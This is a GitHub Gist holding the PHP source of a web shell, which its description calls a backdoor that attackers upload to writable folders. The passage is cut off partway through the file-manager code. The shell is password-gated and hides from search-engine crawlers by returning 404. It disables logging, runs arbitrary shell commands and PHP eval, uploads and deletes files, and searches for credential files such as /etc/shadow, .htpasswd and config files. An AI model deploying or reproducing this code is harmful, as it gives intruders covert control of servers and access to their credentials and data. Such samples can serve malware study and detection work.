Created
January 1, 2014 23:49
-
-
Save dodyw/8213007 to your computer and use it in GitHub Desktop.
Backdoor script type #2, usually uploaded by hacker to folder with 777 permission.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| $auth_pass = "460c3646e4c75a4fae5c8fe817e0c435"; | |
| $color = "#00FF66"; | |
| $default_use_ajax = true; | |
| $default_charset = 'Windows-1251'; | |
| $default_action = 'FilesMan'; | |
| if(!empty($_SERVER['HTTP_USER_AGENT'])) { | |
| $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler"); | |
| if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) { | |
| header('HTTP/1.0 404 Not Found'); | |
| exit; | |
| } | |
| } | |
| @ini_set('error_log',NULL); | |
| @ini_set('log_errors',0); | |
| @ini_set('max_execution_time',0); | |
| @set_time_limit(0); | |
| @set_magic_quotes_runtime(0); | |
| @define('osw_VERSION', '3.1'); | |
| if(get_magic_quotes_gpc()) { | |
| function oswstripslashes($array) { | |
| return is_array($array) ? array_map('oswstripslashes', $array) : stripslashes($array); | |
| } | |
| $_POST = oswstripslashes($_POST); | |
| $_COOKIE = oswstripslashes($_COOKIE); | |
| } | |
| function oswLogin() { | |
| die("<pre align=center><form method=post>Pass: <input type=password name=pass><input type=submit value='>>'></form></pre> © Access denied! :)"); | |
| } | |
| function oswsetcookie($k, $v) { | |
| $_COOKIE[$k] = $v; | |
| setcookie($k, $v); | |
| } | |
| if(!empty($auth_pass)) { | |
| if(isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass)) | |
| oswsetcookie(md5($_SERVER['HTTP_HOST']), $auth_pass); | |
| if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])]) || ($_COOKIE[md5($_SERVER['HTTP_HOST'])] != $auth_pass)) | |
| oswLogin(); | |
| } | |
| if(strtolower(substr(PHP_OS,0,3)) == "win") | |
| $os = 'win'; | |
| else | |
| $os = 'nix'; | |
| $safe_mode = @ini_get('safe_mode'); | |
| if(!$safe_mode) | |
| error_reporting(0); | |
| $disable_functions = @ini_get('disable_functions'); | |
| $home_cwd = @getcwd(); | |
| if(isset($_POST['c'])) | |
| @chdir($_POST['c']); | |
| $cwd = @getcwd(); | |
| if($os == 'win') { | |
| $home_cwd = str_replace("\\", "/", $home_cwd); | |
| $cwd = str_replace("\\", "/", $cwd); | |
| } | |
| if($cwd[strlen($cwd)-1] != '/') | |
| $cwd .= '/'; | |
| if(!isset($_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'])) | |
| $_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'] = (bool)$default_use_ajax; | |
| if($os == 'win') | |
| $aliases = array( | |
| "List Directory" => "dir", | |
| "Find index.php in current dir" => "dir /s /w /b index.php", | |
| "Find *config*.php in current dir" => "dir /s /w /b *config*.php", | |
| "Show active connections" => "netstat -an", | |
| "Show running services" => "net start", | |
| "User accounts" => "net user", | |
| "Show computers" => "net view", | |
| "ARP Table" => "arp -a", | |
| "IP Configuration" => "ipconfig /all" | |
| ); | |
| else | |
| $aliases = array( | |
| "List dir" => "ls -lha", | |
| "list file attributes on a Linux second extended file system" => "lsattr -va", | |
| "show opened ports" => "netstat -an | grep -i listen", | |
| "process status" => "ps aux", | |
| "Find" => "", | |
| "find all suid files" => "find / -type f -perm -04000 -ls", | |
| "find suid files in current dir" => "find . -type f -perm -04000 -ls", | |
| "find all sgid files" => "find / -type f -perm -02000 -ls", | |
| "find sgid files in current dir" => "find . -type f -perm -02000 -ls", | |
| "find config.inc.php files" => "find / -type f -name config.inc.php", | |
| "find config* files" => "find / -type f -name \"config*\"", | |
| "find config* files in current dir" => "find . -type f -name \"config*\"", | |
| "find all writable folders and files" => "find / -perm -2 -ls", | |
| "find all writable folders and files in current dir" => "find . -perm -2 -ls", | |
| "find all service.pwd files" => "find / -type f -name service.pwd", | |
| "find service.pwd files in current dir" => "find . -type f -name service.pwd", | |
| "find all .htpasswd files" => "find / -type f -name .htpasswd", | |
| "find .htpasswd files in current dir" => "find . -type f -name .htpasswd", | |
| "find all .bash_history files" => "find / -type f -name .bash_history", | |
| "find .bash_history files in current dir" => "find . -type f -name .bash_history", | |
| "find all .fetchmailrc files" => "find / -type f -name .fetchmailrc", | |
| "find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc", | |
| "Locate" => "", | |
| "locate httpd.conf files" => "locate httpd.conf", | |
| "locate vhosts.conf files" => "locate vhosts.conf", | |
| "locate proftpd.conf files" => "locate proftpd.conf", | |
| "locate psybnc.conf files" => "locate psybnc.conf", | |
| "locate my.conf files" => "locate my.conf", | |
| "locate admin.php files" =>"locate admin.php", | |
| "locate cfg.php files" => "locate cfg.php", | |
| "locate conf.php files" => "locate conf.php", | |
| "locate config.dat files" => "locate config.dat", | |
| "locate config.php files" => "locate config.php", | |
| "locate config.inc files" => "locate config.inc", | |
| "locate config.inc.php" => "locate config.inc.php", | |
| "locate config.default.php files" => "locate config.default.php", | |
| "locate config* files " => "locate config", | |
| "locate .conf files"=>"locate '.conf'", | |
| "locate .pwd files" => "locate '.pwd'", | |
| "locate .sql files" => "locate '.sql'", | |
| "locate .htpasswd files" => "locate '.htpasswd'", | |
| "locate .bash_history files" => "locate '.bash_history'", | |
| "locate .mysql_history files" => "locate '.mysql_history'", | |
| "locate .fetchmailrc files" => "locate '.fetchmailrc'", | |
| "locate backup files" => "locate backup", | |
| "locate dump files" => "locate dump", | |
| "locate priv files" => "locate priv" | |
| ); | |
| function oswHeader() { | |
| if(empty($_POST['charset'])) | |
| $_POST['charset'] = $GLOBALS['default_charset']; | |
| global $color; | |
| echo "<html><head><meta http-equiv='Content-Type' content='text/html; charset=" . $_POST['charset'] . "'><title>" . $_SERVER['HTTP_HOST'] . " - osw " . osw_VERSION ."</title> | |
| <style> | |
| body{background-color:#444;color:#e1e1e1;} | |
| body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; } | |
| table.info{ color:#fff;background-color:#222; } | |
| span,h1,a{ color: $color !important; } | |
| span{ font-weight: bolder; } | |
| h1{ border-left:5px solid $color;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; } | |
| div.content{ padding: 5px;margin-left:5px;background-color:#333; } | |
| a{ text-decoration:none; } | |
| a:hover{ text-decoration:underline; } | |
| .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; } | |
| .bigarea{ width:100%;height:300px; } | |
| input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid $color; font: 9pt Monospace,'Courier New'; } | |
| form{ margin:0px; } | |
| #toolsTbl{ text-align:center; } | |
| .toolsInp{ width: 300px } | |
| .main th{text-align:left;background-color:#5e5e5e;} | |
| .main tr:hover{background-color:#5e5e5e} | |
| .l1{background-color:#444} | |
| .l2{background-color:#333} | |
| pre{font-family:Courier,Monospace;} | |
| </style> | |
| <script> | |
| var c_ = '" . htmlspecialchars($GLOBALS['cwd']) . "'; | |
| var a_ = '" . htmlspecialchars(@$_POST['a']) ."' | |
| var charset_ = '" . htmlspecialchars(@$_POST['charset']) ."'; | |
| var p1_ = '" . ((strpos(@$_POST['p1'],"\n")!==false)?'':htmlspecialchars($_POST['p1'],ENT_QUOTES)) ."'; | |
| var p2_ = '" . ((strpos(@$_POST['p2'],"\n")!==false)?'':htmlspecialchars($_POST['p2'],ENT_QUOTES)) ."'; | |
| var p3_ = '" . ((strpos(@$_POST['p3'],"\n")!==false)?'':htmlspecialchars($_POST['p3'],ENT_QUOTES)) ."'; | |
| var d = document; | |
| function set(a,c,p1,p2,p3,charset) { | |
| if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_; | |
| if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_; | |
| if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_; | |
| if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_; | |
| if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_; | |
| if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_; | |
| } | |
| function g(a,c,p1,p2,p3,charset) { | |
| set(a,c,p1,p2,p3,charset); | |
| d.mf.submit(); | |
| } | |
| function a(a,c,p1,p2,p3,charset) { | |
| set(a,c,p1,p2,p3,charset); | |
| var params = 'ajax=true'; | |
| for(i=0;i<d.mf.elements.length;i++) | |
| params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value); | |
| sr('" . addslashes($_SERVER['REQUEST_URI']) ."', params); | |
| } | |
| function sr(url, params) { | |
| if (window.XMLHttpRequest) | |
| req = new XMLHttpRequest(); | |
| else if (window.ActiveXObject) | |
| req = new ActiveXObject('Microsoft.XMLHTTP'); | |
| if (req) { | |
| req.onreadystatechange = processReqChange; | |
| req.open('POST', url, true); | |
| req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded'); | |
| req.send(params); | |
| } | |
| } | |
| function processReqChange() { | |
| if( (req.readyState == 4) ) | |
| if(req.status == 200) { | |
| var reg = new RegExp(\"(\\\\d+)([\\\\S\\\\s]*)\", 'm'); | |
| var arr=reg.exec(req.responseText); | |
| eval(arr[2].substr(0, arr[1])); | |
| } else alert('Request error!'); | |
| } | |
| </script> | |
| <head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'> | |
| <form method=post name=mf style='display:none;'> | |
| <input type=hidden name=a> | |
| <input type=hidden name=c> | |
| <input type=hidden name=p1> | |
| <input type=hidden name=p2> | |
| <input type=hidden name=p3> | |
| <input type=hidden name=charset> | |
| </form>"; | |
| $freeSpace = @diskfreespace($GLOBALS['cwd']); | |
| $totalSpace = @disk_total_space($GLOBALS['cwd']); | |
| $totalSpace = $totalSpace?$totalSpace:1; | |
| $release = @php_uname('r'); | |
| $kernel = @php_uname('s'); | |
| $explink = 'http://exploit-db.com/search/?action=search&filter_description='; | |
| if(strpos('Linux', $kernel) !== false) | |
| $explink .= urlencode('Linux Kernel ' . substr($release,0,6)); | |
| else | |
| $explink .= urlencode($kernel . ' ' . substr($release,0,3)); | |
| if(!function_exists('posix_getegid')) { | |
| $user = @get_current_user(); | |
| $uid = @getmyuid(); | |
| $gid = @getmygid(); | |
| $group = "?"; | |
| } else { | |
| $uid = @posix_getpwuid(posix_geteuid()); | |
| $gid = @posix_getgrgid(posix_getegid()); | |
| $user = $uid['name']; | |
| $uid = $uid['uid']; | |
| $group = $gid['name']; | |
| $gid = $gid['gid']; | |
| } | |
| $cwd_links = ''; | |
| $path = explode("/", $GLOBALS['cwd']); | |
| $n=count($path); | |
| for($i=0; $i<$n-1; $i++) { | |
| $cwd_links .= "<a href='#' onclick='g(\"FilesMan\",\""; | |
| for($j=0; $j<=$i; $j++) | |
| $cwd_links .= $path[$j].'/'; | |
| $cwd_links .= "\")'>".$path[$i]."/</a>"; | |
| } | |
| $charsets = array('UTF-8', 'Windows-1251', 'KOI8-R', 'KOI8-U', 'cp866'); | |
| $opt_charsets = ''; | |
| foreach($charsets as $item) | |
| $opt_charsets .= '<option value="'.$item.'" '.($_POST['charset']==$item?'selected':'').'>'.$item.'</option>'; | |
| $m = array('Sec. Info'=>'SecInfo','Files'=>'FilesMan','Php'=>'Php'); | |
| if(!empty($GLOBALS['auth_pass'])) | |
| $m['Logout'] = 'Logout'; | |
| $m['Framer'] = 'Framer'; | |
| $menu = ''; | |
| foreach($m as $k => $v) | |
| $menu .= '<th width="'.(int)(100/count($m)).'%">[ <a href="#" onclick="g(\''.$v.'\',null,\'\',\'\',\'\')">'.$k.'</a> ]</th>'; | |
| $drives = ""; | |
| if($GLOBALS['os'] == 'win') { | |
| foreach(range('c','z') as $drive) | |
| if(is_dir($drive.':\\')) | |
| $drives .= '<a href="#" onclick="g(\'FilesMan\',\''.$drive.':/\')">[ '.$drive.' ]</a> '; | |
| } | |
| echo '<table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:' . ($GLOBALS['os'] == 'win'?'<br>Drives:':'') . '</span></td>' | |
| . '<td><nobr>' . substr(@php_uname(), 0, 120) . ' <a href="' . $explink . '" target=_blank>[exploit-db.com]</a></nobr><br>' . $uid . ' ( ' . $user . ' ) <span>Group:</span> ' . $gid . ' ( ' . $group . ' )<br>' . @phpversion() . ' <span>Safe mode:</span> ' . ($GLOBALS['safe_mode']?'<font color=red>ON</font>':'<font color=green><b>OFF</b></font>') | |
| . ' <a href=# onclick="g(\'Php\',null,\'\',\'info\')">[ phpinfo ]</a> <span>Datetime:</span> ' . date('Y-m-d H:i:s') . '<br>' . oswViewSize($totalSpace) . ' <span>Free:</span> ' . oswViewSize($freeSpace) . ' ('. (int) ($freeSpace/$totalSpace*100) . '%)<br>' . $cwd_links . ' '. oswPermsColor($GLOBALS['cwd']) . ' <a href=# onclick="g(\'FilesMan\',\'' . $GLOBALS['home_cwd'] . '\',\'\',\'\',\'\')">[ home ]</a><br>' . $drives . '</td>' | |
| . '<td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset">' . $opt_charsets . '</optgroup></select><br><span>Server IP:</span><br>' . @$_SERVER["SERVER_ADDR"] . '<br><span>Client IP:</span><br>' . $_SERVER['REMOTE_ADDR'] . '</nobr></td></tr></table>' | |
| . '<table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr>' . $menu . '</tr></table><div style="margin:5">'; | |
| } | |
| function oswFooter() { | |
| $is_writable = is_writable($GLOBALS['cwd'])?" <font color='green'>(Writeable)</font>":" <font color=red>(Not writable)</font>"; | |
| echo " | |
| </div> | |
| <table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'> | |
| <tr> | |
| <td><form onsubmit='g(null,this.c.value,\"\");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='" . htmlspecialchars($GLOBALS['cwd']) ."'><input type=submit value='>>'></form></td> | |
| <td><form onsubmit=\"g('FilesTools',null,this.f.value);return false;\"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> | |
| </tr><tr> | |
| <td><form onsubmit=\"g('FilesMan',null,'mkdir',this.d.value);return false;\"><span>Make dir:</span>$is_writable<br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td> | |
| <td><form onsubmit=\"g('FilesTools',null,this.f.value,'mkfile');return false;\"><span>Make file:</span>$is_writable<br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> | |
| </tr><tr> | |
| <td><form onsubmit=\"g('Console',null,this.c.value);return false;\"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td> | |
| <td><form method='post' ENCTYPE='multipart/form-data'> | |
| <input type=hidden name=a value='FilesMAn'> | |
| <input type=hidden name=c value='" . $GLOBALS['cwd'] ."'> | |
| <input type=hidden name=p1 value='uploadFile'> | |
| <input type=hidden name=charset value='" . (isset($_POST['charset'])?$_POST['charset']:'') . "'> | |
| <span>Upload file:</span>$is_writable<br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td> | |
| </tr></table></div></body></html>"; | |
| } | |
| if (!function_exists("posix_getpwuid") && (strpos($GLOBALS['disable_functions'], 'posix_getpwuid')===false)) { | |
| function posix_getpwuid($p) {return false;} } | |
| if (!function_exists("posix_getgrgid") && (strpos($GLOBALS['disable_functions'], 'posix_getgrgid')===false)) { | |
| function posix_getgrgid($p) {return false;} } | |
| function oswEx($in) { | |
| $out = ''; | |
| if (function_exists('exec')) { | |
| @exec($in,$out); | |
| $out = @join("\n",$out); | |
| } elseif (function_exists('passthru')) { | |
| ob_start(); | |
| @passthru($in); | |
| $out = ob_get_clean(); | |
| } elseif (function_exists('system')) { | |
| ob_start(); | |
| @system($in); | |
| $out = ob_get_clean(); | |
| } elseif (function_exists('shell_exec')) { | |
| $out = shell_exec($in); | |
| } elseif (is_resource($f = @popen($in,"r"))) { | |
| $out = ""; | |
| while(!@feof($f)) | |
| $out .= fread($f,1024); | |
| pclose($f); | |
| } | |
| return $out; | |
| } | |
| function oswViewSize($s) { | |
| if (is_int($s)) | |
| $s = sprintf("%u", $s); | |
| if($s >= 1073741824) | |
| return sprintf('%1.2f', $s / 1073741824 ). ' GB'; | |
| elseif($s >= 1048576) | |
| return sprintf('%1.2f', $s / 1048576 ) . ' MB'; | |
| elseif($s >= 1024) | |
| return sprintf('%1.2f', $s / 1024 ) . ' KB'; | |
| else | |
| return $s . ' B'; | |
| } | |
| function oswPerms($p) { | |
| if (($p & 0xC000) == 0xC000)$i = 's'; | |
| elseif (($p & 0xA000) == 0xA000)$i = 'l'; | |
| elseif (($p & 0x8000) == 0x8000)$i = '-'; | |
| elseif (($p & 0x6000) == 0x6000)$i = 'b'; | |
| elseif (($p & 0x4000) == 0x4000)$i = 'd'; | |
| elseif (($p & 0x2000) == 0x2000)$i = 'c'; | |
| elseif (($p & 0x1000) == 0x1000)$i = 'p'; | |
| else $i = 'u'; | |
| $i .= (($p & 0x0100) ? 'r' : '-'); | |
| $i .= (($p & 0x0080) ? 'w' : '-'); | |
| $i .= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x' ) : (($p & 0x0800) ? 'S' : '-')); | |
| $i .= (($p & 0x0020) ? 'r' : '-'); | |
| $i .= (($p & 0x0010) ? 'w' : '-'); | |
| $i .= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x' ) : (($p & 0x0400) ? 'S' : '-')); | |
| $i .= (($p & 0x0004) ? 'r' : '-'); | |
| $i .= (($p & 0x0002) ? 'w' : '-'); | |
| $i .= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x' ) : (($p & 0x0200) ? 'T' : '-')); | |
| return $i; | |
| } | |
| function oswPermsColor($f) { | |
| if (!@is_readable($f)) | |
| return '<font color=#FF0000>' . oswPerms(@fileperms($f)) . '</font>'; | |
| elseif (!@is_writable($f)) | |
| return '<font color=white>' . oswPerms(@fileperms($f)) . '</font>'; | |
| else | |
| return '<font color=#25ff00>' . oswPerms(@fileperms($f)) . '</font>'; | |
| } | |
| function oswScandir($dir) { | |
| if(function_exists("scandir")) { | |
| return scandir($dir); | |
| } else { | |
| $dh = opendir($dir); | |
| while (false !== ($filename = readdir($dh))) | |
| $files[] = $filename; | |
| return $files; | |
| } | |
| } | |
| function oswWhich($p) { | |
| $path = oswEx('which ' . $p); | |
| if(!empty($path)) | |
| return $path; | |
| return false; | |
| } | |
| function actionSecInfo() { | |
| oswHeader(); | |
| echo '<h1>Server security information</h1><div class=content>'; | |
| function oswSecParam($n, $v) { | |
| $v = trim($v); | |
| if($v) { | |
| echo '<span>' . $n . ': </span>'; | |
| if(strpos($v, "\n") === false) | |
| echo $v . '<br>'; | |
| else | |
| echo '<pre class=ml1>' . $v . '</pre>'; | |
| } | |
| } | |
| oswSecParam('Server software', @getenv('SERVER_SOFTWARE')); | |
| if(function_exists('apache_get_modules')) | |
| oswSecParam('Loaded Apache modules', implode(', ', apache_get_modules())); | |
| oswSecParam('Disabled PHP Functions', $GLOBALS['disable_functions']?$GLOBALS['disable_functions']:'none'); | |
| oswSecParam('Open base dir', @ini_get('open_basedir')); | |
| oswSecParam('Safe mode exec dir', @ini_get('safe_mode_exec_dir')); | |
| oswSecParam('Safe mode include dir', @ini_get('safe_mode_include_dir')); | |
| oswSecParam('cURL support', function_exists('curl_version')?'enabled':'no'); | |
| $temp=array(); | |
| if(function_exists('mysql_get_client_info')) | |
| $temp[] = "MySql (".mysql_get_client_info().")"; | |
| if(function_exists('mssql_connect')) | |
| $temp[] = "MSSQL"; | |
| if(function_exists('pg_connect')) | |
| $temp[] = "PostgreSQL"; | |
| if(function_exists('oci_connect')) | |
| $temp[] = "Oracle"; | |
| oswSecParam('Supported databases', implode(', ', $temp)); | |
| echo '<br>'; | |
| if($GLOBALS['os'] == 'nix') { | |
| oswSecParam('Readable /etc/passwd', @is_readable('/etc/passwd')?"yes <a href='#' onclick='g(\"FilesTools\", \"/etc/\", \"passwd\")'>[view]</a>":'no'); | |
| oswSecParam('Readable /etc/shadow', @is_readable('/etc/shadow')?"yes <a href='#' onclick='g(\"FilesTools\", \"/etc/\", \"shadow\")'>[view]</a>":'no'); | |
| oswSecParam('OS version', @file_get_contents('/proc/version')); | |
| oswSecParam('Distr name', @file_get_contents('/etc/issue.net')); | |
| if(!$GLOBALS['safe_mode']) { | |
| $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl'); | |
| $danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja'); | |
| $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror'); | |
| echo '<br>'; | |
| $temp=array(); | |
| foreach ($userful as $item) | |
| if(oswWhich($item)) | |
| $temp[] = $item; | |
| oswSecParam('Userful', implode(', ',$temp)); | |
| $temp=array(); | |
| foreach ($danger as $item) | |
| if(oswWhich($item)) | |
| $temp[] = $item; | |
| oswSecParam('Danger', implode(', ',$temp)); | |
| $temp=array(); | |
| foreach ($downloaders as $item) | |
| if(oswWhich($item)) | |
| $temp[] = $item; | |
| oswSecParam('Downloaders', implode(', ',$temp)); | |
| echo '<br/>'; | |
| oswSecParam('HDD space', oswEx('df -h')); | |
| oswSecParam('Hosts', @file_get_contents('/etc/hosts')); | |
| echo '<br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit=\'g(null,null,"5",this.param1.value,this.param2.value);return false;\'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form>'; | |
| if (isset ($_POST['p2'], $_POST['p3']) && is_numeric($_POST['p2']) && is_numeric($_POST['p3'])) { | |
| $temp = ""; | |
| for(;$_POST['p2'] <= $_POST['p3'];$_POST['p2']++) { | |
| $uid = @posix_getpwuid($_POST['p2']); | |
| if ($uid) | |
| $temp .= join(':',$uid)."\n"; | |
| } | |
| echo '<br/>'; | |
| oswSecParam('Users', $temp); | |
| } | |
| } | |
| } else { | |
| oswSecParam('OS Version',oswEx('ver')); | |
| oswSecParam('Account Settings',oswEx('net accounts')); | |
| oswSecParam('User Accounts',oswEx('net user')); | |
| } | |
| echo '</div>'; | |
| oswFooter(); | |
| } | |
| function actionPhp() { | |
| if(isset($_POST['ajax'])) { | |
| oswsetcookie(md5($_SERVER['HTTP_HOST']) . 'ajax', true); | |
| ob_start(); | |
| eval($_POST['p1']); | |
| $temp = "document.getElementById('PhpOutput').style.display='';document.getElementById('PhpOutput').innerHTML='" . addcslashes(htmlspecialchars(ob_get_clean()), "\n\r\t\\'\0") . "';\n"; | |
| echo strlen($temp), "\n", $temp; | |
| exit; | |
| } | |
| if(empty($_POST['ajax']) && !empty($_POST['p1'])) | |
| oswsetcookie(md5($_SERVER['HTTP_HOST']) . 'ajax', 0); | |
| oswHeader(); | |
| if(isset($_POST['p2']) && ($_POST['p2'] == 'info')) { | |
| echo '<h1>PHP info</h1><div class=content><style>.p {color:#000;}</style>'; | |
| ob_start(); | |
| phpinfo(); | |
| $tmp = ob_get_clean(); | |
| $tmp = preg_replace(array ( | |
| '!(body|a:\w+|body, td, th, h1, h2) {.*}!msiU', | |
| '!td, th {(.*)}!msiU', | |
| '!<img[^>]+>!msiU', | |
| ), array ( | |
| '', | |
| '.e, .v, .h, .h th {$1}', | |
| '' | |
| ), $tmp); | |
| echo str_replace('<h1','<h2', $tmp) .'</div><br>'; | |
| } | |
| echo '<h1>Execution PHP-code</h1><div class=content><form name=pf method=post onsubmit="if(this.ajax.checked){a(\'Php\',null,this.code.value);}else{g(\'Php\',null,this.code.value,\'\');}return false;"><textarea name=code class=bigarea id=PhpCode>'.(!empty($_POST['p1'])?htmlspecialchars($_POST['p1']):'').'</textarea><input type=submit value=Eval style="margin-top:5px">'; | |
| echo ' <input type=checkbox name=ajax value=1 '.($_COOKIE[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'').'> send using AJAX</form><pre id=PhpOutput style="'.(empty($_POST['p1'])?'display:none;':'').'margin-top:5px;" class=ml1>'; | |
| if(!empty($_POST['p1'])) { | |
| ob_start(); | |
| eval($_POST['p1']); | |
| echo htmlspecialchars(ob_get_clean()); | |
| } | |
| echo '</pre></div>'; | |
| oswFooter(); | |
| } | |
| function actionFilesMan() { | |
| if (!empty ($_COOKIE['f'])) | |
| $_COOKIE['f'] = @unserialize($_COOKIE['f']); | |
| if(!empty($_POST['p1'])) { | |
| switch($_POST['p1']) { | |
| case 'uploadFile': | |
| if(!@move_uploaded_file($_FILES['f']['tmp_name'], $_FILES['f']['name'])) | |
| echo "Can't upload file!"; | |
| break; | |
| case 'mkdir': | |
| if(!@mkdir($_POST['p2'])) | |
| echo "Can't create new dir"; | |
| break; | |
| case 'delete': | |
| function deleteDir($path) { | |
| $path = (substr($path,-1)=='/') ? $path:$path.'/'; | |
| $dh = opendir($path); | |
| while ( ($item = readdir($dh) ) !== false) { | |
| $item = $path.$item; | |
| if ( (basename($item) == "..") || (basename($item) == ".") ) | |
| continue; | |
| $type = filetype($item); | |
| if ($type == "dir") | |
| deleteDir($item); | |
| else | |
| @unlink($item); | |
| } | |
| closedir($dh); | |
| @rmdir($path); | |
| } | |
| if(is_array(@$_POST['f'])) | |
| foreach($_POST['f'] as $f) { | |
| if($f == '..') | |
| continue; | |
| $f = urldecode($f); | |
| if(is_dir($f)) | |
| deleteDir($f); | |
| else | |
| @unlink($f); | |
| } | |
| break; | |
| case 'paste': | |
| if($_COOKIE['act'] == 'copy') { | |
| function copy_paste($c,$s,$d){ | |
| if(is_dir($c.$s)){ | |
| mkdir($d.$s); | |
| $h = @opendir($c.$s); | |
| while (($f = @readdir($h)) !== false) | |
| if (($f != ".") and ($f != "..")) | |
| copy_paste($c.$s.'/',$f, $d.$s.'/'); | |
| } elseif(is_file($c.$s)) | |
| @copy($c.$s, $d.$s); | |
| } | |
| foreach($_COOKIE['f'] as $f) | |
| copy_paste($_COOKIE['c'],$f, $GLOBALS['cwd']); | |
| } elseif($_COOKIE['act'] == 'move') { | |
| function move_paste($c,$s,$d){ | |
| if(is_dir($c.$s)){ | |
| mkdir($d.$s); | |
| $h = @opendir($c.$s); | |
| while (($f = @readdir($h)) !== false) | |
| if (($f != ".") and ($f != "..")) | |
| copy_paste($c.$s.'/',$f, $d.$s.'/'); | |
| } elseif(@is_file($c.$s)) | |
| @copy($c.$s, $d.$s); | |
| } | |
| foreach($_COOKIE['f'] as $f) | |
| @rename($_COOKIE['c'].$f, $GLOBALS['cwd'].$f); | |
| } elseif($_COOKIE['act'] == 'zip') { | |
| if(class_exists('ZipArchive')) { | |
| $zip = new ZipArchive(); | |
| if ($zip->open($_POST['p2'], 1)) { | |
| chdir($_COOKIE['c']); | |
| foreach($_COOKIE['f'] as $f) { | |
| if($f == '..') | |
| continue; | |
| if(@is_file($_COOKIE['c'].$f)) | |
| $zip->addFile($_COOKIE['c'].$f, $f); | |
| elseif(@is_dir($_COOKIE['c'].$f)) { | |
| $iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f.'/', 4096)); | |
| foreach ($iterator as $key=>$value) { | |
| $zip->addFile(realpath($key), $key); | |
| } | |
| } | |
| } | |
| chdir($GLOBALS['cwd']); | |
| $zip->close(); | |
| } | |
| } | |
| } elseif($_COOKIE['act'] == 'unzip') { | |
| if(class_exists('ZipArchive')) { | |
| $zip = new ZipArchive(); | |
| foreach($_COOKIE['f'] as $f) { | |
| if($zip->open($_COOKIE['c'].$f)) { | |
| $zip->extractTo($GLOBALS['cwd']); | |
| $zip->close(); | |
| } | |
| } | |
| } | |
| } elseif($_COOKIE['act'] == 'tar') { | |
| chdir($_COOKIE['c']); | |
| $_COOKIE['f'] = array_map('escapeshellarg', $_COOKIE['f']); | |
| oswEx('tar cfzv ' . escapeshellarg($_POST['p2']) . ' ' . implode(' ', $_COOKIE['f'])); | |
| chdir($GLOBALS['cwd']); | |
| } | |
| unset($_COOKIE['f']); | |
| setcookie('f', '', time() - 3600); | |
| break; | |
| default: | |
| if(!empty($_POST['p1'])) { | |
| oswsetcookie('act', $_POST['p1']); | |
| oswsetcookie('f', serialize(@$_POST['f'])); | |
| oswsetcookie('c', @$_POST['c']); | |
| } | |
| break; | |
| } | |
| } | |
| oswHeader(); | |
| echo '<h1>File manager</h1><div class=content><script>p1_=p2_=p3_="";</script>'; | |
| $dirContent = oswScandir(isset($_POST['c'])?$_POST['c']:$GLOBALS['cwd']); | |
| if($dirContent === false) { echo 'Can\'t open this folder!';oswFooter(); return; } | |
| global $sort; | |
| $sort = array('name', 1); | |
| if(!empty($_POST['p1'])) { | |
| if(preg_match('!s_([A-z]+)_(\d{1})!', $_POST['p1'], $match)) | |
| $sort = array($match[1], (int)$match[2]); | |
| } | |
| echo "<script> | |
| function sa() { | |
| for(i=0;i<d.files.elements.length;i++) | |
| if(d.files.elements[i].type == 'checkbox') | |
| d.files.elements[i].checked = d.files.elements[0].checked; | |
| } | |
| </script> | |
| <table width='100%' class='main' cellspacing='0' cellpadding='2'> | |
